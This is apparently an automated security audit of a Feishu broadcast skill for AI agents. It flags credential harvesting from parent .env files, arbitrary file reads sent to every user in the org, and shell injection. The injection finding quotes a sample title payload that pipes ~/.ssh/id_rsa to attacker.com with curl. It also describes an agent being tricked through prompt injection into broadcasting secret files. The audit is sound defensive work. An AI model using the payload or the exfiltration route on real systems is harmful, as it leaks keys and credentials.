Is autogame-17/feishu-broadcast safe?

https://github.com/openclaw/skills/tree/main/skills/autogame-17/feishu-broadcast

65
CAUTION

The feishu-broadcast skill contains three compounding security issues that make it dangerous without review: (1) lib/api.js traverses up to four parent directories to find and load .env files, potentially harvesting workspace credentials; (2) index.js can read arbitrary files via --text-file and immediately broadcast their contents to all org users, creating a one-step exfiltration vector; and (3) shell command injection is possible via unsanitized template literal interpolation of user-controlled arguments into child_process.exec() calls. The skill's SKILL.md is clean with no prompt injection, and the install itself was well-behaved, but the runtime code surface poses genuine credential-harvesting and command-injection risks that would be triggered when an AI agent executes the skill.

Category Scores

Prompt Injection 90/100 · 30%
Data Exfiltration 28/100 · 25%
Code Execution 45/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 40/100 · 5%

Findings (7)

HIGH Multi-level parent directory .env traversal -35

lib/api.js constructs an array of possibleEnvPaths that includes path.resolve(__dirname, '../../../.env') and path.resolve(__dirname, '../../../../.env'). When installed at a typical location such as ~/agent/skills/feishu-broadcast/lib/, these paths resolve to ~/agent/skills/.env and ~/agent/.env respectively — well outside the skill's own directory. This code will silently load and consume credentials from parent workspace directories, including any Anthropic API keys, database URLs, or cloud provider tokens stored there.

HIGH Arbitrary file read broadcast to all org users -30

index.js accepts a --text-file argument and reads the file with fs.readFileSync, then passes the entire contents as the message body for a broadcast to every user in the Feishu tenant. An AI agent instructed (or tricked via prompt injection from another source) to 'send a report' using a sensitive file path (e.g., --text-file ~/.ssh/id_rsa) would exfiltrate that file's contents to all employees, providing both exfiltration and social engineering in one action.

HIGH Shell command injection via unsanitized exec() template literals -35

index.js constructs shell commands using ES6 template literals with argv.title and argv.image inserted without escaping or sanitization. An agent that passes a crafted title containing shell metacharacters (e.g., a title ending with "; curl attacker.com/exfil -d @~/.ssh/id_rsa; echo ") would cause arbitrary command execution on the host running the agent. The argv.image parameter has the same vulnerability in the feishu-sticker command.

MEDIUM Mass-broadcast primitive amplifies impact of any misuse -30

Unlike skills that message specific users, this skill fetches ALL users from the Feishu directory and sends to each one. Any error in agent judgment — whether from prompt injection, misunderstood intent, or shell injection — is immediately org-wide in effect. There is a --dry-run flag but no confirmation step, rate limiting is only 1s between sends (not a true safety gate), and no scoping to specific channels or groups.

MEDIUM Transitive trust dependency on two unaudited skills -20

The skill delegates message sending to feishu-post/send.js and feishu-sticker/send.js via shell exec(). If either of those skills is compromised or malicious, they execute under the same process context with full access to all environment variables loaded by this skill (including the credentials harvested by the .env traversal). The security of this skill is thus partially delegated to two external skills.

LOW Undocumented broadcast scope in SKILL.md -10

SKILL.md does not clearly communicate to users or agents that this skill sends to ALL users in the tenant, not a targeted subset. An agent reasoning about 'sending an announcement' may not realize the full org-wide blast radius, increasing the likelihood of accidental mass messaging.

INFO Clean install with expected network connections only 0

The installation process made only expected connections to GitHub (140.82.121.4) and Ubuntu infrastructure. No connections to attacker-controlled servers, no unexpected process spawning, and filesystem changes were limited to the target skill directory.